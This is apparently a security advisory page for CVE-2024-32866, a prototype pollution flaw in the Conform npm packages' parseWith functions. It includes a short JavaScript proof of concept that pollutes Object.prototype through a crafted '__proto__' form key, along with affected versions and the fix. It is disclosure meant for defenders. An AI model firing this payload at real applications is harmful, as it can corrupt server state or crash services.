Ecosyste.ms: Advisories

An open API service providing security vulnerability metadata for many open source software ecosystems.

Security Advisories: GSA_kwCzR0hTQS02MjRnLThxamctOHF4Zs4AA7QR

Conform contains a Prototype Pollution Vulnerability in `parseWith...` function

Summary

Conform allows the parsing of nested objects in the form of object.property. Due to an improper implementation of this feature, an attacker can exploit it to trigger prototype pollution by passing a crafted input to parseWith... functions.

PoC

const { parseWithZod } = require('@conform-to/zod');
const { z } = require("zod");

const param = new URLSearchParams("__proto__.pollution=polluted");
const schema = z.object({ "a": z.string() });

parseWithZod(param, { schema });
console.log("pollution:", ({}).pollution); // should print "polluted"

Details

The invocation of the parseWithZod function in the above PoC triggers the setValue function through getSubmissionContext and parse, executing the following process, resulting in prototype pollution:

let pointer = value;

pointer.__proto__ = pointer.__proto__;
pointer = pointer.__proto__;

pointer.polluted = "polluted";

This is caused by the lack of object existence checking on line 117 in formdata.ts, where the code only checks for the presence of pointer[key] without proper validation.

Impact

Applications that use conform for server-side validation of form data or URL parameters are affected by this vulnerability.

Permalink: https://github.com/advisories/GHSA-624g-8qjg-8qxf
JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS02MjRnLThxamctOHF4Zs4AA7QR
Source: GitHub Advisory Database
Origin: Unspecified
Severity: High
Classification: General
Published: 13 days ago
Updated: 13 days ago

CVSS Score: 8.6
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H

Identifiers: GHSA-624g-8qjg-8qxf, CVE-2024-32866
References:

Repository: https://github.com/edmundhung/conform
Blast Radius: 13.4

Affected Packages

npm:@conform-to/yup

Dependent packages: 1
Dependent repositories: 2
Downloads: 1,248 last month
Affected Version Ranges: <= 1.1.0
Fixed in: 1.1.1
All affected versions: 0.3.0, 0.3.1, 0.4.0, 0.4.1, 0.5.0, 0.5.1, 0.6.0, 0.6.1, 0.6.2, 0.6.3, 0.7.0, 0.7.1, 0.7.2, 0.7.3, 0.7.4, 0.8.0, 0.8.1, 0.8.2, 0.9.0, 0.9.1, 1.0.0, 1.0.1, 1.0.2, 1.0.3, 1.0.4, 1.0.5, 1.0.6, 1.1.0
All unaffected versions: 1.1.1, 1.1.2, 1.1.3

npm:@conform-to/zod

Dependent packages: 5
Dependent repositories: 36
Downloads: 149,479 last month
Affected Version Ranges: <= 1.1.0
Fixed in: 1.1.1
All affected versions: 0.1.0, 0.1.1, 0.2.0, 0.3.0, 0.3.1, 0.4.0, 0.4.1, 0.5.0, 0.5.1, 0.6.0, 0.6.1, 0.6.2, 0.6.3, 0.7.0, 0.7.1, 0.7.2, 0.7.3, 0.7.4, 0.8.0, 0.8.1, 0.8.2, 0.9.0, 0.9.1, 1.0.0, 1.0.1, 1.0.2, 1.0.3, 1.0.4, 1.0.5, 1.0.6, 1.1.0
All unaffected versions: 1.1.1, 1.1.2, 1.1.3

npm:@conform-to/dom

Dependent packages: 3
Dependent repositories: 28
Downloads: 156,843 last month
Affected Version Ranges: <= 1.1.0
Fixed in: 1.1.1
All affected versions: 0.1.0, 0.1.1, 0.2.0, 0.3.0, 0.3.1, 0.4.0, 0.4.1, 0.5.0, 0.5.1, 0.6.0, 0.6.1, 0.6.2, 0.6.3, 0.7.0, 0.7.1, 0.7.2, 0.7.3, 0.7.4, 0.8.0, 0.8.1, 0.8.2, 0.9.0, 0.9.1, 1.0.0, 1.0.1, 1.0.2, 1.0.3, 1.0.4, 1.0.5, 1.0.6, 1.1.0
All unaffected versions: 1.1.1, 1.1.2, 1.1.3